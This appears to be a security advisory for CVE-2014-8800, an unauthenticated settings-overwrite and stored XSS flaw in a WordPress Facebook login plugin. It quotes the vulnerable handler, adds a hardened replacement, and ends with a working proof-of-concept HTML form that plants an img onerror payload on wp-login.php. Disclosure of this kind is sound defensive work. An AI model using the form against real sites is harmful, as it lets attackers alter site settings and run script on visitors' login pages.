Nextend Facebook Connect 1.4.59 XSS

Homepage:

https://wordpress.org/plugins/nextend-facebook-connect

CVE-ID

CVE-2014-8800

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

The settings handler in nextend-facebook-settings.php processes any POST request that carries newfb_update_options=Y. It performs no capability check (current_user_can) and no nonce check (check_admin_referer), and it serialises the entire $_POST array into the nextend_fb_connect option, so any visitor can overwrite every plugin setting with a single request (the same request also works as CSRF against a logged-in administrator). The fb_login_button setting is later printed unescaped on wp-login.php, so an attacker-controlled value becomes stored XSS on the login page.

File: nextend-facebook-connect/nextend-facebook-settings.php

if(isset($_POST['newfb_update_options'])) {
	if($_POST['newfb_update_options'] == 'Y') {
		// No current_user_can() capability check and no check_admin_referer()
		// nonce check: this block runs for any request that sets the flag.
		foreach($_POST AS $k => $v){
			$_POST[$k] = stripslashes($v);   // only undoes magic quotes; no sanitisation
		}
		// Every POST field, whatever its name, is stored as a plugin setting.
		update_option("nextend_fb_connect", maybe_serialize($_POST));
		$newfb_status = 'update_success';
	}
}
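The handler a practitioner would expect instead, as an added example that is not the plugin's own code: the update is gated on a capability and a nonce, only a whitelist of known keys is copied out of $_POST, each value is sanitised for its type, and the stored markup is passed through kses again when it is rendered on the login page. The nonce action and field names (newfb_update_options / newfb_nonce), the fb_appid key, and the hook choices are assumptions for illustration; fb_login_button and the nextend_fb_connect option name come from the advisory.

```php
<?php
// Added example, not the plugin's code. Hook names, nonce names and the
// fb_appid key are assumed for illustration.

function newfb_handle_settings_update() {
    if ( ! isset( $_POST['newfb_update_options'] ) || $_POST['newfb_update_options'] !== 'Y' ) {
        return null;
    }

    // 1. Authorisation: only users who may manage options can change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. Anti-CSRF: the settings form must carry a nonce emitted with
    //    wp_nonce_field( 'newfb_update_options', 'newfb_nonce' ). Dies on mismatch.
    check_admin_referer( 'newfb_update_options', 'newfb_nonce' );

    // 3. Never persist $_POST wholesale: copy only known keys, sanitised per type.
    $allowed = array(
        'fb_login_button' => 'html',   // button markup later rendered on wp-login.php
        'fb_appid'        => 'text',   // assumed key name, plain text only
    );

    $current  = get_option( 'nextend_fb_connect', array() );
    $settings = is_array( $current ) ? $current : array();

    foreach ( $allowed as $key => $type ) {
        if ( ! isset( $_POST[ $key ] ) ) {
            continue;
        }
        $value = wp_unslash( $_POST[ $key ] );           // replaces the stripslashes() loop
        $settings[ $key ] = ( $type === 'html' )
            ? wp_kses_post( $value )                     // strips <script> and on* handlers
            : sanitize_text_field( $value );
    }

    // update_option() serialises arrays itself; maybe_serialize() is not needed.
    update_option( 'nextend_fb_connect', $settings );
    return 'update_success';
}
// Handle the form on an admin-only hook, not on every front-end request.
add_action( 'admin_init', 'newfb_handle_settings_update' );

// Output side: run the stored markup through kses again at render time so a
// value written by any other code path cannot reintroduce event handlers.
function newfb_render_login_button() {
    $settings = get_option( 'nextend_fb_connect', array() );
    $markup   = isset( $settings['fb_login_button'] ) ? $settings['fb_login_button'] : '';
    echo wp_kses_post( $markup );
}
add_action( 'login_form', 'newfb_render_login_button' );
```

With this handler the PoC below fails twice over: the request is rejected before any write because it carries no valid nonce and no manage_options session, and even a value stored by an authorised user loses its onerror attribute, because wp_kses_post allows <img> but not event-handler attributes.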

Proof of Concept:

<form method="post" action="http://wordpress-installation">
    <input type="hidden" name="newfb_update_options" value="Y">
    <!-- the browser decodes the entities, so the submitted value is the literal <img> tag -->
    XSS: <textarea name="fb_login_button" rows="10" cols="40">&lt;img src=x onerror=alert(String.fromCharCode(88,83,83))&gt;</textarea>
    <input type="submit" value="Hack!">
</form>

XSS will be visible:

http://wordpress-installation/wp-login.php

Timeline: